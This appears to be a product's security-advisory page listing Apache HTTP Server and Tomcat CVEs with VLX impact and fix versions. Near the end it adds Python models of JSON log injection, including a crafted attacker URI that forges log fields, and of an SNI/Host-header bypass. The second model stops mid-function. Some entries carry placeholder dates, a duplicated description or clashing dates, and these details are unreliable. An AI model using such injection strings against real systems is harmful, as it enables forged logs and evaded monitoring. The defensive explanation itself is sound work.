
Security Vulnerabilities


React2Shell (CVE-2025-55182)

VISULOX is not affected by CVE-2025-55182

Apache HTTP

Each entry below gives the CVE, the affected Apache module where stated, the publish date, the CVSS score, the description, whether VLX is affected, and the VLX version that fixes it.

CVE-2023-31122 (mod_macro), published 2023-10-19, CVSS score: low
mod_macro buffer over-read
Out-of-bounds Read vulnerability in mod_macro of Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.57.
VLX affected: not affected

CVE-2023-43622, published 2023-09-15, CVSS score: low
Apache HTTP Server: DoS in HTTP/2 with initial window size 0
An attacker, opening an HTTP/2 connection with an initial window size of 0, was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern.
This has been fixed in version 2.4.58, so that such connections are terminated properly after the configured connection timeout.
This issue affects Apache HTTP Server: from 2.4.55 through 2.4.57.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2023-45802, published 2023-10-12, CVSS score: moderate
Apache HTTP Server: HTTP/2 stream memory not reclaimed right away on RST
When an HTTP/2 stream was reset (RST frame) by a client, there was a time window where the request's memory resources were not reclaimed immediately. Instead, de-allocation was deferred to connection close. A client could send new requests and resets, keeping the connection busy and open and causing the memory footprint to keep on growing. On connection close, all resources were reclaimed, but the process might run out of memory before that.
This was found by the reporter during testing of CVE-2023-44487 (HTTP/2 Rapid Reset Exploit) with their own test client. During "normal" HTTP/2 use, the probability to hit this bug is very low. The kept memory would not become noticeable before the connection closes or times out.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2023-38709, published 2023-06-26, CVSS score: moderate
Apache HTTP Server: HTTP response splitting
Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.
This issue affects Apache HTTP Server: through 2.4.58.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-24795, published 2023-09-06, CVSS score: low
Apache HTTP Server: HTTP Response Splitting in multiple modules
HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.
Users are recommended to upgrade to version 2.4.59, which fixes this issue.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-27316, published 2024-02-22, CVSS score: moderate
Apache HTTP Server: HTTP/2 DoS by memory exhaustion on endless continuation frames
HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-36387, published 2024-04-01, CVSS score: low
Apache HTTP Server: DoS by Null pointer in websocket over HTTP/2
Serving WebSocket protocol upgrades over an HTTP/2 connection could result in a Null Pointer dereference, leading to a crash of the server process, degrading performance.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-38472, published 2024-04-01, CVSS score: important
Apache HTTP Server on Windows UNC SSRF
SSRF in Apache HTTP Server on Windows allows NTLM hashes to potentially be leaked to a malicious server via SSRF and malicious requests or content.
VLX affected: not affected

CVE-2024-38473 (mod_proxy), published 2024-04-01, CVSS score: moderate
Apache HTTP Server proxy encoding problem
Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-38474, published 2024-04-01, CVSS score: important
Apache HTTP Server weakness with encoded question marks in backreferences
Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to execute scripts in directories permitted by the configuration but not directly reachable by any URL, or to obtain source disclosure of scripts meant only to be executed as CGI.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-38475 (mod_rewrite), published 2024-04-01, CVSS score: important
Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure.
Substitutions in server context that use backreferences or variables as the first segment of the substitution are affected. Some unsafe RewriteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-38476, published 2024-04-01, CVSS score: important
Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
A vulnerability in the core of Apache HTTP Server 2.4.59 and earlier makes it vulnerable to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-38477 (mod_proxy), published 2024-04-01, CVSS score: important
Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
Null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-39573 (mod_rewrite), published 2024-04-01, CVSS score: important
Apache HTTP Server: mod_rewrite proxy handler substitution
Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly set up URLs to be handled by mod_proxy.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-39884, published 2024-07-01, CVSS score: important
A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2024-40725, published 2024-07-09, CVSS score: important
A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.
VLX affected: up to version 4.1.0; fixed in 4.1.1

CVE-2024-40898 (mod_rewrite), published 2024-07-12, CVSS score: important
SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context allows NTLM hashes to potentially be leaked to a malicious server via SSRF and malicious requests.
VLX affected: up to version 4.1.0; fixed in 4.1.1

CVE-2024-42516, published 2025-07-10, CVSS score: moderate
HTTP response splitting in the core of Apache HTTP Server allows an attacker who can manipulate the Content-Type response headers of applications hosted or proxied by the server to split the HTTP response.
This vulnerability was described as CVE-2023-38709 but the patch included in Apache HTTP Server 2.4.59 did not address the issue.
Users are recommended to upgrade to version 2.4.64, which fixes this issue.
VLX affected: up to version 4.3.0; fixed in 4.3.1

CVE-2024-43204 (mod_headers, mod_proxy), published 2025-07-10, CVSS score: low
SSRF in Apache HTTP Server with mod_proxy loaded allows an attacker to send outbound proxy requests to a URL controlled by the attacker. Requires an unlikely configuration where mod_headers is configured to modify the Content-Type request or response header with a value provided in the HTTP request.
Users are recommended to upgrade to version 2.4.64, which fixes this issue.
VLX affected: not affected

CVE-2024-43394, published 2025-07-10, CVSS score: moderate
Server-Side Request Forgery (SSRF) in Apache HTTP Server on Windows allows NTLM hashes to potentially be leaked to a malicious server via mod_rewrite or Apache expressions that pass unvalidated request input.
This issue affects Apache HTTP Server: from 2.4.0 through 2.4.63.
Note: The Apache HTTP Server Project will be setting a higher bar for accepting vulnerability reports regarding SSRF via UNC paths. The server offers limited protection against administrators directing the server to open UNC paths. Windows servers should limit the hosts they will connect to over SMB, given the nature of NTLM authentication.
VLX affected: not affected

CVE-2024-47252 (mod_ssl), published 2025-07-10, CVSS score: low
Insufficient escaping of user-supplied data in mod_ssl in Apache HTTP Server 2.4.63 and earlier allows an untrusted SSL/TLS client to insert escape characters into log files in some configurations.
In a logging configuration where CustomLog is used with "%{varname}x" or "%{varname}c" to log variables provided by mod_ssl such as SSL_TLS_SNI, no escaping is performed by either mod_log_config or mod_ssl and unsanitized data provided by the client may appear in log files.
VLX affected: not affected

CVE-2025-23048 (mod_ssl), published 2025-07-10, CVSS score: moderate
In some mod_ssl configurations on Apache HTTP Server 2.4.35 through to 2.4.62, an access control bypass by trusted clients is possible using TLS 1.3 session resumption.
Configurations are affected when mod_ssl is configured for multiple virtual hosts, with each restricted to a different set of trusted client certificates (for example with a different SSLCACertificateFile/Path setting). In such a case, a client trusted to access one virtual host may be able to access another virtual host, if SSLStrictSNIVHostCheck is not enabled in either virtual host.
VLX affected: not investigated; fixed in 4.3.1

CVE-2025-49630 (mod_proxy_http2), published 2025-07-10, CVSS score: low
In certain proxy configurations, a denial of service attack against Apache HTTP Server versions 2.4.26 through to 2.4.63 can be triggered by untrusted clients causing an assertion in mod_proxy_http2.
Affected configurations are those where a reverse proxy is configured for an HTTP/2 backend, with ProxyPreserveHost set to "on".
VLX affected: not affected

CVE-2025-49812 (mod_ssl), published 2025-07-10, CVSS score: moderate
In some mod_ssl configurations on Apache HTTP Server versions through to 2.4.63, an HTTP desynchronisation attack allows a man-in-the-middle attacker to hijack an HTTP session via a TLS upgrade.
Only configurations using "SSLEngine optional" to enable TLS upgrades are affected. Users are recommended to upgrade to version 2.4.64, which removes support for TLS upgrade.
VLX affected: not affected

CVE-2025-53020, published 2025-07-10, CVSS score: moderate
Late Release of Memory after Effective Lifetime vulnerability in Apache HTTP Server.
This issue affects Apache HTTP Server: from 2.4.17 up to 2.4.63.
Users are recommended to upgrade to version 2.4.64, which fixes the issue.
VLX affected: not investigated; fixed in 4.3.1

CVE-2025-54090, published 2025-07-16, CVSS score: moderate
Apache HTTP Server: 'RewriteCond expr' always evaluates to true in 2.4.64
HTTP response splitting in the core of Apache HTTP Server allows an attacker who can manipulate the Content-Type response headers of applications hosted or proxied by the server to split the HTTP response.
This vulnerability was described as CVE-2023-38709 but the patch included in Apache HTTP Server 2.4.59 did not address the issue.
Users are recommended to upgrade to version 2.4.64, which fixes this issue.
VLX affected: not investigated; fixed in 4.3.1

CVE-2025-66200 (mod_userdir, suexec), published 2025-11-19, CVSS score: moderate
Apache HTTP Server: mod_userdir+suexec bypass via AllowOverride FileInfo
mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid.
This issue affects Apache HTTP Server: from 2.4.7 through 2.4.65.
Users are recommended to upgrade to version 2.4.66, which fixes the issue.
VLX affected: not affected

CVE-2025-65082, published 2025-11-14, CVSS score: low
Apache HTTP Server: CGI environment variable override
Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache HTTP Server through environment variables set via the Apache configuration unexpectedly superseding variables calculated by the server for CGI programs.
This issue affects Apache HTTP Server from 2.4.0 through 2.4.65.
Users are recommended to upgrade to version 2.4.66, which fixes the issue.
VLX affected: not investigated; fixed in 4.3.2

CVE-2025-59775, published 2025-09-10, CVSS score: moderate
Apache HTTP Server: NTLM Leakage on Windows through UNC SSRF
Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows with AllowEncodedSlashes On and MergeSlashes Off allows NTLM hashes to potentially be leaked to a malicious server via SSRF and malicious requests or content.
Users are recommended to upgrade to version 2.4.66, which fixes the issue.
VLX affected: not affected

CVE-2025-58098 (mod_include, mod_cgid), published 2025-08-21, CVSS score: moderate
Server Side Includes adds query string to #exec cmd=...
Apache HTTP Server 2.4.65 and earlier with Server Side Includes (SSI) enabled and mod_cgid (but not mod_cgi) passes the shell-escaped query string to #exec cmd="..." directives.
This issue affects Apache HTTP Server before 2.4.66.
Users are recommended to upgrade to version 2.4.66, which fixes the issue.
VLX affected: not affected

CVE-2025-55753 (mod_md), published 2025-08-15, CVSS score: low
mod_md (ACME), unintended retry intervals
An integer overflow in the case of failed ACME certificate renewal leads, after a number of failures (~30 days in default configurations), to the backoff timer becoming 0. Attempts to renew the certificate are then repeated without delay until one succeeds.
This issue affects Apache HTTP Server: from 2.4.30 before 2.4.66.
Users are recommended to upgrade to version 2.4.66, which fixes the issue.
VLX affected: not affected

Apache Tomcat

Each entry below gives the CVE, the publish date, the CVSS score, the description (including the fixing Tomcat commit and the affected Tomcat 9.0.x versions where stated), whether VLX is affected, and the VLX version that fixes it.

CVE-2023-41080, published 2023-08-22, CVSS score: moderate
Open redirect
If the ROOT (default) web application is configured to use FORM authentication then it is possible that a specially crafted URL could be used to trigger a redirect to a URL of the attacker's choice.
VLX affected: not affected

CVE-2023-45648, published 2023-10-10, CVSS score: important
Request smuggling
Tomcat did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.
VLX affected: not affected

CVE-2023-44487, published 2023-10-10, CVSS score: important
Denial of Service
Tomcat's HTTP/2 implementation was vulnerable to the rapid reset attack. The denial of service typically manifested as an OutOfMemoryError.
VLX affected: not affected

CVE-2023-42795, published 2023-10-10, CVSS score: important
Information Disclosure
When recycling various internal objects, including the request and the response, prior to re-use by the next request/response, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next.
VLX affected: up to version 4.0.1; fixed in 4.1.0

CVE-2023-42794, published 2023-10-10, CVSS score: low
Denial of Service
Tomcat's internal fork of Commons FileUpload included an unreleased, in-progress refactoring that exposed a potential denial of service on Windows if a web application opened a stream for an uploaded file but failed to close the stream. The file would never be deleted from disk, creating the possibility of an eventual denial of service due to the disk being full.
VLX affected: not affected

CVE-2023-46589, published 2023-11-28, CVSS score: important
Request smuggling
Tomcat did not correctly parse HTTP trailer headers. A specially crafted trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.
VLX affected: not affected

CVE-2024-23672, published 2024-03-13, CVSS score: important
Denial of Service
It was possible for a WebSocket client to keep a WebSocket connection open leading to increased resource consumption.
VLX affected: not affected

CVE-2024-24549, published 2024-03-13, CVSS score: important
Denial of Service
When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.
VLX affected: not affected

CVE-2024-34750, published 2024-07-03, CVSS score: important
Denial of Service
When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed.
VLX affected: not affected

CVE-2024-38286, published 2024-09-23, CVSS score: important
Tomcat, under certain configurations on any platform, allows an attacker to cause an OutOfMemoryError by abusing the TLS handshake process.
This was fixed with commit 76c5cce6.
This issue was reported to the Tomcat Security Team on 4 June 2024. The issue was made public on 23 September 2024.
Affects: 9.0.13 to 9.0.89
VLX affected: not affected

CVE-2024-52316, published 2024-11-18, CVSS score: low
Authentication Bypass
If Tomcat was configured to use a custom Jakarta Authentication (formerly JASPIC) ServerAuthContext component which may throw an exception during the authentication process without explicitly setting an HTTP status to indicate failure, the authentication may not have failed, allowing the user to bypass the authentication process. There are no known Jakarta Authentication components that behave in this way.
This was fixed with commit 7532f9dc.
This issue was identified by the Tomcat Security Team on 19 September 2024. The issue was made public on 18 November 2024.
Affects: 9.0.0-M1 to 9.9.95
VLX affected: not affected

CVE-2024-52317, published 2024-11-18, CVSS score: important
Request and/or response mix-up
Incorrect recycling of the request and response used by HTTP/2 requests could lead to request and/or response mix-up between users.
This was fixed with commit 47307ee2.
This issue was identified by the Tomcat Security Team on 1 October 2024. The issue was made public on 18 November 2024.
Affects: 9.0.92 to 9.0.95
VLX affected: not affected

CVE-2024-52318, published 2024-11-18, CVSS score: important
XSS in generated JSPs
The fix for improvement 69333 caused pooled JSP tags not to be released after use which in turn could cause output of some tags not to be escaped as expected. This unescaped output could lead to XSS.
This was fixed with commit 9813c5dd.
The issue was made public on 18 November 2024.
Affects: 9.0.96
VLX affected: not affected

CVE-2024-54677, published 2024-12-17, CVSS score: low
DoS in examples web application
Numerous examples in the examples web application did not place limits on uploaded data enabling an OutOfMemoryError to be triggered causing a denial of service.
This was fixed with commits 1d88dd3f, 721544ea, 84065e26, 3315a902, c2f7ce21, 75ff7e86, 4d5cc653, 84c4af76 and 9ffd23fc.
The issue was made public on 17 December 2024.
Affects: 9.0.0.M1 to 9.0.97
VLX affected: not affected

CVE-2024-56337, published 2024-12-20, CVSS score: important
Remote Code Execution via write enabled Default Servlet. Mitigation for CVE-2024-50379 was incomplete
The previous mitigation for CVE-2024-50379 was incomplete. In addition to upgrading to 9.0.98 or later, users running Tomcat on a case insensitive file system with the default servlet write enabled may need additional configuration depending on the version of Java being used:
  • running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)
  • running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)
  • running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)
The issue was made public on 20 December 2024.
Affects: 9.0.0.M1 to 9.0.97
VLX affected: not affected

CVE-2024-50379, published 2024-12-17, CVSS score: important
Remote Code Execution via write enabled Default Servlet
If the default servlet is write enabled (readonly initialisation parameter set to the non-default value of false) for a case insensitive file system, concurrent read and upload under load of the same file can bypass Tomcat's case sensitivity checks and cause an uploaded file to be treated as a JSP leading to remote code execution.
This was fixed with commits 43b507eb and 631500b0.
The issue was made public on 17 December 2024.
Affects: 9.0.0.M1 to 9.0.97
VLX affected: not affected

CVE-2025-24813, published 2025-02-10, CVSS score: important
Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet
The original implementation of partial PUT used a temporary file based on the user provided file name and path with the path separator replaced by ".".
If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:
  • writes enabled for the default servlet (disabled by default)
  • support for partial PUT (enabled by default)
  • a target URL for security sensitive uploads that is a sub-directory of a target URL for public uploads
  • attacker knowledge of the names of security sensitive files being uploaded
  • the security sensitive files also being uploaded via partial PUT
If all of the following were true, a malicious user was able to perform remote code execution:
  • writes enabled for the default servlet (disabled by default)
  • support for partial PUT (enabled by default)
  • application was using Tomcat's file based session persistence with the default storage location
  • application included a library that may be leveraged in a deserialization attack
This was fixed with commit eb61aade.
The issue was made public on 10 March 2025.
Affects: 9.0.0.M1 to 9.0.98
VLX affected: not affected

CVE-2025-31651, published 2025-04-08, CVSS score: low
Rewrite rule bypass
For a subset of unlikely rewrite rule configurations, it was possible for a specially crafted request to bypass some rewrite rules. If those rewrite rules effectively enforced security constraints, those constraints could be bypassed.
This was fixed with commits ee3ab548 and 175dc75f.
The issue was made public on 28 April 2025.
Affects: 9.0.0.M1 to 9.0.102
VLX affected: not affected

CVE-2025-31650, published 2025-04-08, CVSS score: important
Denial of Service via invalid HTTP priority header
Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException resulting in a denial of service.
This was fixed with commits 40ae788c, b98e74f5 and b7674782.
The issue was made public on 28 April 2025.
Affects: 9.0.76 to 9.0.102
VLX affected: not affected

CVE-2025-46701, published 2025-05-12, CVSS score: low
CGI security constraint bypass
When running on a case insensitive file system with security constraints configured for the pathInfo component of a URL that mapped to the CGI servlet, it was possible to bypass those security constraints with a specially crafted URL.
This was fixed with commits 8df00018 and 8cb95ff0.
The issue was made public on 29 May 2025.
Affects: 9.0.0.M1 to 9.0.104
VLX affected: not affected

CVE-2025-48976, published 2025-05-29, CVSS score: important
DoS in Commons FileUpload
Apache Commons FileUpload provided a hard-coded limit of 10kB for the size of the headers associated with a multipart request. A specially crafted request that used a large number of parts with large headers could trigger excessive memory usage leading to a DoS. This limit is now configurable (maxPartHeaderSize on the Connector) with a default of 512 bytes.
This was fixed with commit 97790a35.
The issue was made public on 16 June 2025.
VLX affected: not affected

CVE-2025-48988, published 2025-06-16, CVSS score: important
DoS in multipart upload
Tomcat used the same limit for both request parameters and parts in a multipart request. Since uploaded parts also include headers which must be retained, processing multipart requests can result in significantly more memory usage. A specially crafted request that used a large number of parts could trigger excessive memory usage leading to a DoS. The maximum number of parts is now configurable (maxPartCount on the Connector) with a default of 10 parts.
This was fixed with commit ee8042ff.
The issue was made public on 16 June 2025.
Affects: 9.0.0.M1 to 9.0.105
VLX affected: not investigated; fixed in 4.3.1

CVE-2025-49124, published 2025-06-16, CVSS score: low
Side-loading via Tomcat installer for Windows
During installation, the Tomcat installer for Windows used icacls.exe without specifying a full path. This enabled a side-loading vulnerability.
This was fixed with commit 28726cc2.
The issue was made public on 16 June 2025.
Affects: 9.0.23 to 9.0.105
VLX affected: not affected

CVE-2025-49125, published 2025-06-16, CVSS score: moderate
Security constraint bypass for PreResources and PostResources
When using PreResources or PostResources mounted other than at the root of the web application, it was possible to access those resources via an unexpected path. That path was likely not to be protected by the same security constraints as the expected path, allowing those security constraints to be bypassed.
This was fixed with commit 9418e3ff.
The issue was made public on 16 June 2025.
Affects: 9.0.0.M1 to 9.0.105
VLX affected: not affected

CVE-2025-53506, published 2025-07-xx, CVSS score: important
DoS via excessive HTTP/2 streams
This was fixed with commit 43477293.
The issue was made public on XXX July 2025.
Affects: 9.0.0.M1 to 9.0.106
VLX affected: not affected

CVE-2025-52520, published 2025-07-xx, CVSS score: low
DoS due to overflow in file upload limit
This was fixed with commit 927d66fb.
The issue was made public on XXX July 2025.
Affects: 9.0.0.M1 to 9.0.106
VLX affected: not investigated; fixed in 4.3.1

CVE-2025-52434, published 2025-07-xx, CVSS score: important
DoS with HTTP/2 and APR/Native
This was fixed with commit 8a83c3c4.
The issue was made public on XXX July 2025.
Affects: 9.0.0.M1 to 9.0.106
VLX affected: not affected

CVE-2025-48989, published 2025-08-13, CVSS score: important
DoS in HTTP/2 due to client triggered stream reset
Tomcat's HTTP/2 implementation was vulnerable to the "made you reset" attack. The denial of service typically manifested as an OutOfMemoryError.
This was fixed with commit f36b8a4e.
The issue was made public on 13 August 2025.
Affects: 9.0.0.M1 to 9.0.107
VLX affected: not affected

CVE-2025-55754, published 2025-10-27, CVSS score: low
Console manipulation via escape sequences in log messages
Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems.
This was fixed with commit a03cabf3.
This issue was reported to the Tomcat security team on 5 August 2025. The issue was made public on 27 October 2025.
Affects: 9.0.40 to 9.0.108
VLX affected: not affected

CVE-2025-55752, published 2025-10-27, CVSS score: important
Directory traversal via Rewrite Valve with possible remote code execution if PUT is enabled
The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI.
This was fixed with commit b5042622.
This issue was reported to the Tomcat security team on 11 August 2025. The issue was made public on 27 October 2025.
Affects: 9.0.0.M11 to 9.0.108
VLX affected: not affected

CVE-2025-61795, published 2025-10-27, CVSS score: low
Delayed cleaning of multipart upload temporary files may lead to DoS
If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to local storage were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS.
This was fixed with commit afa422bd.
This issue was reported to the Tomcat security team on 7 September 2025. The issue was made public on 27 October 2025.
Affects: 9.0.0.M1 to 9.0.109
VLX affected: up to version 4.3.1; fixed in 4.3.2

CVE-2026-24734, published 2026-01-23, CVSS score: moderate
Incomplete OCSP verification checks
When using an OCSP responder, Tomcat's FFM integration with OpenSSL did not complete verification or freshness checks on the OCSP response which could allow certificate revocation to be bypassed.
Affects: 9.0.83 to 9.0.114
VLX affected: not affected

CVE-2026-24733, published 2025-12-07, CVSS score: low
Security constraint bypass
Tomcat did not limit HTTP/0.9 requests to the GET method. If a security constraint was configured to allow HEAD requests to a URI but deny GET requests, the user could bypass that constraint on GET requests by sending a (specification invalid) HEAD request using HTTP/0.9.
This was fixed with commit 2e2fa23f.
This issue was identified by the Tomcat security team on 26 November 2025. The issue was made public on 17 February 2026.
Affects: 9.0.0.M1 to 9.0.112
VLX affected: not affected

CVE-2025-66614, published 2025-12-07, CVSS score: moderate
Client certificate verification bypass due to virtual host mapping
Tomcat did not validate that the host name provided via the SNI extension was the same as the host name provided in the HTTP host header field. If Tomcat was configured with more than one virtual host and the TLS configuration for one of those hosts did not require client certificate authentication but another one did, it was possible for a client to bypass the client certificate authentication by sending different host names in the SNI extension and the HTTP host header field.
The vulnerability only applies if client certificate authentication is only enforced at the Connector. It does not apply if client certificate authentication is enforced at the web application.
This was fixed with commits 152c1488, a4aa7423 and 9276b5e7.
This issue was reported to the Tomcat security team on 15 October 2025. The issue was made public on 17 February 2026.
Affects: 9.0.0.M1 to 9.0.112
VLX affected: not affected

2026-04-03

Moderate

CVE-2026-34500

OCSP checks sometimes soft-fail with FFM even when soft-fail is disabled
CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled and FFM is used.

This was fixed with commit ff589ab2.

This issue was reported to the Tomcat security team on 25 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.92 to 9.0.116

under investigation

2026-04-03

low

CVE-2026-34487

Cloud membership for clustering component exposed the Kubernetes bearer token
The cloud membership for clustering component exposed the Kubernetes bearer token in log messages.

This was fixed with commit f593292a.

This issue was reported to the Tomcat security team on 25 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.13 to 9.0.116

under investigation

2026-04-03

Important

CVE-2026-34486

The fix for CVE-2026-29146 allowed the bypass of the EncryptInterceptor
An error in the fix for CVE-2026-29146 allowed the EncryptInterceptor to be bypassed.

This was fixed with commit 776e12b3.

This issue was reported to the Tomcat security team on 26 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.116

under investigation

2026-04-03

low

CVE-2026-34483

Incomplete escaping of JSON access logs
Incomplete escaping when non-default values were used for the Connector attributes relaxedPathChars and/or relaxedQueryChars allowed the injection of arbitrary JSON into the JSON access log.

This was fixed with commit 97566842.

This issue was reported to the Tomcat security team on 25 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.40 to 9.0.116

under investigation
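What incomplete escaping of the request URI does to a JSON access log, as an added example that is not Tomcat's code: a naive logger that interpolates the URI, the encoder-based logger that escapes every field, and a check for keys the logger never meant to write. The attacker string assumes a connector configured (via relaxedQueryChars) to let `"` through; the field names and values are constructed.

```python
import json

# Added example, not Tomcat's code: what incomplete escaping of the request URI does to
# a JSON access log, beside the encoder-based logger that escapes every field. The
# attacker string assumes a connector configured (via relaxedQueryChars) to pass '"'
# through; field names and values are constructed.


def naive_json_access_log(method, uri, status):
    """Vulnerable (modelled): interpolates the URI on the assumption that the connector
    already rejected every character that needs JSON escaping."""
    return '{"method":"%s","request":"%s","status":%d}' % (method, uri, status)


def safe_json_access_log(method, uri, status):
    """Correct: the JSON encoder escapes every field, whatever the connector let through."""
    return json.dumps({"method": method, "request": uri, "status": status},
                      ensure_ascii=True, separators=(",", ":"))


def parse_record(line):
    return json.loads(line)


def injected_keys(line, expected=frozenset({"method", "request", "status"})):
    """Keys in the parsed record that the logger never meant to write."""
    return set(parse_record(line)) - set(expected)


# Constructed attacker request: closes the "request" string and adds its own fields.
ATTACK_URI = '/app?q=x","user":"admin","auth":"ok","note":"'

if __name__ == "__main__":
    for line in (naive_json_access_log("GET", ATTACK_URI, 403),
                 safe_json_access_log("GET", ATTACK_URI, 403)):
        print(line, injected_keys(line))
```

The naive line still parses as valid JSON, which is exactly why downstream tooling (a SIEM, a log shipper) accepts the forged `user` and `auth` fields; the encoder-based line keeps the whole attacker string inside the `request` value.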

2026-03-20

Moderate

CVE-2026-32990

The fix for CVE-2025-66614 was incomplete
The validation of the SNI name against the host name did not take account of possible differences in case, allowing the strict SNI checks to be bypassed.

This was fixed with commit 95f77782.

This issue was reported to the Tomcat security team on 13 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.113 to 9.0.115

not affected
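A model of the connector-level check that the SNI/Host header entry above and this follow-up require, as an added example that is not Tomcat's code: the pre-fix dispatch takes the client-certificate requirement from the SNI host's TLS configuration but routes the request by the Host header, while the fixed dispatch refuses any request whose SNI name and Host header name disagree once both are lower-cased and the port is stripped. The virtual-host table, host names and the `normalize_host_header` helper are assumptions made for the example.

```python
# Added example, not Tomcat's code: model of the connector-level check that the TLS SNI
# server name and the HTTP Host header select the same virtual host, including the
# case-insensitive comparison the follow-up fix required.

# Hypothetical virtual-host table: name -> does this host's TLS config require a client cert
VHOSTS = {
    "public.example.com": False,
    "admin.example.com": True,
}


def normalize_host_header(value):
    """Strip an optional :port and lower-case the name (DNS names are case-insensitive)."""
    v = value.strip()
    if v.startswith("["):                       # IPv6 literal, e.g. [::1]:8443
        end = v.find("]")
        if end == -1:
            raise ValueError("malformed IPv6 host header")
        return v[1:end].lower()
    host, sep, port = v.rpartition(":")
    if sep and port.isdigit():
        v = host
    return v.lower()


def vulnerable_dispatch(sni_name, host_header, client_cert_presented):
    """Pre-fix behaviour as the advisory describes it: the client-cert requirement comes
    from the SNI host's TLS config, but the request is routed by the Host header."""
    requires_cert = VHOSTS.get(sni_name.strip().lower(), False)
    if requires_cert and not client_cert_presented:
        return False, "client certificate required"
    target = normalize_host_header(host_header)
    if target not in VHOSTS:
        return False, "unknown virtual host"
    return True, "served by " + target


def fixed_dispatch(sni_name, host_header, client_cert_presented):
    """Post-fix behaviour: refuse the request when SNI and Host disagree (compared after
    normalisation), so the TLS config used for the handshake is the one that belongs to
    the virtual host that will serve the request."""
    sni = sni_name.strip().lower()
    target = normalize_host_header(host_header)
    if sni != target:
        return False, "SNI/Host mismatch"
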